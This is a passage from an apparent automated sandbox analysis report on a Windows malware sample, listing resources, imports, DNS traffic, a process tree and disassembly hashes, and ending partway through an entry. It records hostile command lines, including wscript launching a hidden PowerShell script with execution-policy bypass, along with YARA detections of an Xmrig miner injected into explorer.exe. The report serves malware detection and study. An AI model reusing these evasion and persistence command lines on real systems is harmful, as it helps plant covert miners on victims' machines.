                                RT_ICON0x8b5100x77e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9911040145985401
                                RT_RCDATA0x92cf00x786000AmigaOS outline fontEnglishUnited States0.8973264694213867
                                RT_GROUP_ICON0x818cf00x92dataEnglishUnited States0.6506849315068494
                                RT_VERSION0x818d840x348data0.4714285714285714
                                RT_MANIFEST0x8190cc0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                Imports

                                DLLImport
                                SHLWAPI.dllPathRemoveFileSpecW
                                KERNEL32.dllInitializeSListHead, WriteConsoleW, SizeofResource, GetModuleFileNameW, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, GetModuleHandleW, FreeLibrary, WideCharToMultiByte, HeapSize, CreateFileW, MultiByteToWideChar, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, CloseHandle, SetEvent, ResetEvent, WaitForSingleObjectEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, SetEndOfFile, RtlPcToFileHeader, RaiseException, RtlUnwindEx, GetLastError, LoadLibraryExW, HeapAlloc, HeapReAlloc, HeapFree, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW
                                SHELL32.dllSHGetKnownFolderPath

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 28, 2024 09:45:24.285212994 CET53630441.1.1.1192.168.2.5
                                Oct 28, 2024 09:45:51.034724951 CET5349197162.159.36.2192.168.2.5
                                Oct 28, 2024 09:45:51.709220886 CET53609801.1.1.1192.168.2.5

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:04:45:03
                                Start date:28/10/2024
                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe"
                                Imagebase:0x7ff77acc0000
                                File size:8'467'456 bytes
                                MD5 hash:58819721CBC16EA7033BE23E69BD2058
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:4
                                Start time:04:45:05
                                Start date:28/10/2024
                                Path:C:\Windows\System32\WerFault.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\WerFault.exe -u -p 3500 -s 592
                                Imagebase:0x7ff69e4f0000
                                File size:570'736 bytes
                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:04:45:06
                                Start date:28/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                                Imagebase:0x7ff6033b0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:04:45:06
                                Start date:28/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:04:45:07
                                Start date:28/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:04:45:10
                                Start date:28/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"
                                Imagebase:0x7ff769b80000
                                File size:2'759'232 bytes
                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:10
                                Start time:04:45:10
                                Start date:28/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP"
                                Imagebase:0x7ff752e70000
                                File size:52'744 bytes
                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:11
                                Start time:04:45:14
                                Start date:28/10/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff674740000
                                File size:5'141'208 bytes
                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3351232614.0000000010E18000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3355532590.000000002ACB0000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3351232614.0000000010D31000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3353996348.0000000029EB0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3350741583.0000000010630000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:12
                                Start time:04:45:15
                                Start date:28/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                                Imagebase:0x7ff6033b0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:04:45:15
                                Start date:28/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:14
                                Start time:04:45:15
                                Start date:28/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:15
                                Start time:04:45:15
                                Start date:28/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
                                Imagebase:0x7ff769b80000
                                File size:2'759'232 bytes
                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:16
                                Start time:04:45:16
                                Start date:28/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP"
                                Imagebase:0x7ff752e70000
                                File size:52'744 bytes
                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FF8476E07E8 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ;P_
                                  • API String ID: 0-3238953
                                  • Opcode ID: 4c27f7ffadabbe060c56d4a8c88837eff56b7a1de1902602d1cfbd4c9874a416
                                  • Instruction ID: d47f6410244194e686d38b3efe8f030b8a3a2fc853e5622b686a9053ed01358c
                                  • Opcode Fuzzy Hash: 4c27f7ffadabbe060c56d4a8c88837eff56b7a1de1902602d1cfbd4c9874a416
                                  • Instruction Fuzzy Hash: 00518F21E1EA469FEF44FB7898552BE77A2FF88640F544479D009C76DBDD2CA802CB90
                                  Function 00007FF8476E0A00 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @T]G
                                  • API String ID: 0-910751335
                                  • Opcode ID: 5262f393e03e8f762cf0ed64498804a4a5b3788f623161113ae73d91c2135ae8
                                  • Instruction ID: e66fdeb542dfdd0bcdaef22d116b74f0f082494b620e1ed5432cd3d8ebc500dc
                                  • Opcode Fuzzy Hash: 5262f393e03e8f762cf0ed64498804a4a5b3788f623161113ae73d91c2135ae8
                                  • Instruction Fuzzy Hash: F5314831E2D68E9FDB59AA3C44450BEBBE1EF45252B2409BED48BC7487ED1858478360
                                  Function 00007FF8476E0693 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P_^
                                  • API String ID: 0-571329226
                                  • Opcode ID: b527b8e73b6c4b0fad4141e63a36ed4ffada0b1a8f9741119092e4841683270f
                                  • Instruction ID: 08e599237ce1716a3042111e4808aaf330ab81e9fb992e4db70d79684cd841f4
                                  • Opcode Fuzzy Hash: b527b8e73b6c4b0fad4141e63a36ed4ffada0b1a8f9741119092e4841683270f
                                  • Instruction Fuzzy Hash: 06112B63E0D6C2DFFF15A67C68551B92F91EF917D532808B7C084878C3D81C284B8631
                                  Function 00007FF8476E0AA8 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @T]G
                                  • API String ID: 0-910751335
                                  • Opcode ID: ccb6d02fea3fdd1fce77efb8d72b18b19260c4e72b96a98287e29bbf75673313
                                  • Instruction ID: d8dbbde60599139ff7eecc039b8abc208db96edf4e34d42488d19fe618251e0c
                                  • Opcode Fuzzy Hash: ccb6d02fea3fdd1fce77efb8d72b18b19260c4e72b96a98287e29bbf75673313
                                  • Instruction Fuzzy Hash: A2F02771D0C44DAFEF54EB6C94841FDBBB1FF88240F6008B6D40DD6986ED2819824760
                                  Function 00007FF8476E173D Relevance: .4, Instructions: 417COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e2a27ee437b66cb5b8725efedbce2951edefafb35d8f98c0b06c698a3e302368
                                  • Instruction ID: 2fc2f7b7262ba274542b33706fda955ecae3da82959edcc8f44d42b736c0173b
                                  • Opcode Fuzzy Hash: e2a27ee437b66cb5b8725efedbce2951edefafb35d8f98c0b06c698a3e302368
                                  • Instruction Fuzzy Hash: 85418F24E1EA4A9FDF45F7A888526BD7BA3FF89240F0404B9D009D76D7DD2C68028F50
                                  Function 00007FF8476E0B3A Relevance: .4, Instructions: 361COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da244ca0ad64aaa74092353454ea6f8f53434b5e813fa78915cbbd90dd37d2e1
                                  • Instruction ID: b3e0639fead0d550015330e32ef59dfe23989d05ca4c704e4b0d5a0b02e1ed8d
                                  • Opcode Fuzzy Hash: da244ca0ad64aaa74092353454ea6f8f53434b5e813fa78915cbbd90dd37d2e1
                                  • Instruction Fuzzy Hash: 6AC1F060E1EE0A9FEF94F768849567962D2FF88781F640474D00EC76E6DE2CBC429B50
                                  Function 00007FF8476E121E Relevance: .2, Instructions: 222COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41f2c457c66a140d9a7bddf2bd2a843375799269da90e712783fb19992db6e28
                                  • Instruction ID: caa6e90df433d26f14a2c00f40c6b04542dc1230e0670dfaeffb8e234a67a322
                                  • Opcode Fuzzy Hash: 41f2c457c66a140d9a7bddf2bd2a843375799269da90e712783fb19992db6e28
                                  • Instruction Fuzzy Hash: 5E510630B1D9499FEB8CFB2C98596B963D2FF89741B5000B9E04EC72A7DD1CAC428B51
                                  Function 00007FF8476E2347 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f3c66bbedd7d0efc729c935bad37a837e51961d066296de98459fb310bdb782
                                  • Instruction ID: 35a4a187df428a4028984638b74d3b6f7ad1575607c75d2dbe0d8a20629a93c8
                                  • Opcode Fuzzy Hash: 7f3c66bbedd7d0efc729c935bad37a837e51961d066296de98459fb310bdb782
                                  • Instruction Fuzzy Hash: 99513E60F2ED0A9FEBA4F728C45567962D2EF85781F4404B5E00DC72E6DE6CAC429B50
                                  Function 00007FF8476E2064 Relevance: .1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31786561cd3c20f43cb32ae62abde6d0274abfc4fec0c98f2bb0512a08d0c706
                                  • Instruction ID: 7ebfd0c4d633d5fb044864977e8721636e79222b76b450223e51beef656ccb69
                                  • Opcode Fuzzy Hash: 31786561cd3c20f43cb32ae62abde6d0274abfc4fec0c98f2bb0512a08d0c706
                                  • Instruction Fuzzy Hash: 4241FC64F1EE0A9FDB54F728889666973D3EB9874175404B4E409D32A6DE2CAC429F40
                                  Function 00007FF8476E2635 Relevance: .1, Instructions: 115COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ade19cb910dc79792ae52efeb4379e103db6c2738cadca7e11823d9804031c01
                                  • Instruction ID: 588d47ff43f10125c6744bd53271c1782abee68506d4282bf8098ab623f160eb
                                  • Opcode Fuzzy Hash: ade19cb910dc79792ae52efeb4379e103db6c2738cadca7e11823d9804031c01
                                  • Instruction Fuzzy Hash: 37313A61A0EB864FEF49B73858551BC7BD2EF86240F0504BED44EC71E7DD2DA8468321
                                  Function 00007FF8476E1119 Relevance: .1, Instructions: 103COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a0207ff4e643aac6c3e9e190da2ad10331098a38807c234451f8ece4d5612c74
                                  • Instruction ID: cc6d803b03977634f4d1af51a5cffcc3fe488b1e2f322802e6049d49f83b50e3
                                  • Opcode Fuzzy Hash: a0207ff4e643aac6c3e9e190da2ad10331098a38807c234451f8ece4d5612c74
                                  • Instruction Fuzzy Hash: 1F31F670A1E68A9FEF49BB7848656FC77D2EF45281B0404BDD40EC76D7DD2CA8418720
                                  Function 00007FF8476E0CD6 Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 70c5ddab8e0ea29341131b0f88b30349d334ba15a65d7497a2d3a78727bdb51d
                                  • Instruction ID: 32f4976c256811144d075cf6ac5afe2a04cefea1098aaaea9c33a4981d5ae7b8
                                  • Opcode Fuzzy Hash: 70c5ddab8e0ea29341131b0f88b30349d334ba15a65d7497a2d3a78727bdb51d
                                  • Instruction Fuzzy Hash: 38113C10A1E90ADFEE58B768446527D11D3FF88781F700438E40FC76DADD2CB8426B60
                                  Function 00007FF8476E0CB6 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b16053fb8e5b373358ef57f91fdc4d1c464f411a8359ca62c400d468fb4dc29
                                  • Instruction ID: f70690c561b66be05b04e3f696d711aee8558c84e45915aee765d01b881f4e50
                                  • Opcode Fuzzy Hash: 3b16053fb8e5b373358ef57f91fdc4d1c464f411a8359ca62c400d468fb4dc29
                                  • Instruction Fuzzy Hash: 3F010460A1E90ADFEE58B758846567D11E3FF88781F744434D40FC76EADD2C7842AB60
                                  Function 00007FF8476E0CEE Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca21d21f55aacbdcd557136247b9e9025406cb23a834d89a427ea6aae29935ba
                                  • Instruction ID: b957f19d07882dd56bdc51493311931fe71cc3afc3a22157e568b82cdc1f89ba
                                  • Opcode Fuzzy Hash: ca21d21f55aacbdcd557136247b9e9025406cb23a834d89a427ea6aae29935ba
                                  • Instruction Fuzzy Hash: 1BF0C924A1E90ADEEF58B758846567D11A3EF88781F744538D40EC36EADD2CB842AB20
                                  Function 00007FF8476E0D99 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13bd77a59d84c3d18cc472434e805f9f20d2871425d911662b8adabc6c57c377
                                  • Instruction ID: f2e244a023261fb47b0ceef9f124023e2e066d6d454fa5633a4557d0e7e4945b
                                  • Opcode Fuzzy Hash: 13bd77a59d84c3d18cc472434e805f9f20d2871425d911662b8adabc6c57c377
                                  • Instruction Fuzzy Hash: C5F0F960A1E95ADFEE98FB28845177C62D2FB88781F200474D40ED7AD6DD1DBC41AB60
                                  Function 00007FF8476E1159 Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8244057c62584574bfbb65c7a062ad2fa330e3a756da0f080998c1270de707e2
                                  • Instruction ID: b30ad03eb57c6d154733b71ed188a380bfee214d8c1dab5099da4dde44ace39b
                                  • Opcode Fuzzy Hash: 8244057c62584574bfbb65c7a062ad2fa330e3a756da0f080998c1270de707e2
                                  • Instruction Fuzzy Hash: EDF0A02294E6C69FDB07627A6C600ACBFA6AE5229030A01E7D084C74A3E54D18958772
                                  Function 00007FF8476E2679 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34844a89cb806d24f9792bf7bb52df2778b1672062c5b259c1361e1a1506e91d
                                  • Instruction ID: a1121465b5d745d8593d41346a9f8f8d61a0431a10c48f4a62c6089d19b228db
                                  • Opcode Fuzzy Hash: 34844a89cb806d24f9792bf7bb52df2778b1672062c5b259c1361e1a1506e91d
                                  • Instruction Fuzzy Hash: 9CF0A752D0EAC64FEB1762396D600B87F639E92190B4A01F7C084C70A7E80D18554332

                                  Non-executed Functions

                                  Function 00007FF8476E044A Relevance: 7.7, Strings: 6, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: J]G$0J]G$@J]G$PJ]G$`J]G$pJ]G
                                  • API String ID: 0-1338069578
                                  • Opcode ID: bc20893a6eba7ba0ce4393a625fb93dacec55a6152cd7cb6a025d37c9eca5af7
                                  • Instruction ID: b04d883d04121b38065a8259b1a43192a1375ecb1d510e6bbe73f348d198812b
                                  • Opcode Fuzzy Hash: bc20893a6eba7ba0ce4393a625fb93dacec55a6152cd7cb6a025d37c9eca5af7
                                  • Instruction Fuzzy Hash: E241E552E0E5C2DFFB19967C381107D2FA2EF5666072945FBD488CB8DBD81C9C0A83A1
                                  Function 00007FF8476E0550 Relevance: 5.1, Strings: 4, Instructions: 73COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
